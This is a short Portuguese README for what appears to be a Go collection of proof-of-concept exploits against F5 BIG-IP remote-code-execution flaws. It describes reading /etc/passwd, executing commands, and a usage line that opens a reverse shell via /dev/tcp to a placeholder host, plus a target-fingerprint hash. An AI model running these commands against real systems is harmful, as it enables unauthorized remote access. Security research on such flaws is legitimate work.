
Coleção de PoCs CVE-2020-5902 CVE-2021-22986 CVE-2022-1388
Escrito em Go, coleção de PoCs para CVE-2020-5902, CVE-2021-22986 e CVE-2022-1388. Outros PoCs do F5 serão adicionados posteriormente.
autor:160team.west9B
Uso exclusivo para pesquisadores de segurança autorizados. Cumpra a lei de segurança cibernética. Quaisquer problemas decorrentes do uso são de responsabilidade do usuário, não do autor.
Coleção de PoCs do F5:
CVE-2020-5902: Vulnerabilidade de execução remota de código no F5 BIG-IP
CVE-2021-22986: Vulnerabilidade de execução remota de comandos sem autenticação no F5 BIG-IP iControl REST
CVE-2022-1388: Execução remota de comandos com bypass de autenticação
A verificação da CVE-2020-5902 usa download arbitrário de arquivos. Se /etc/passwd for retornado, a vulnerabilidade existe.
Os PoCs da CVE-2021-22986 e da CVE-2022-1388 executam o comando id por padrão. Se {id} for retornado, a vulnerabilidade existe. Você pode personalizar o comando usando -c.
uso: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

icon_hash="-335242539"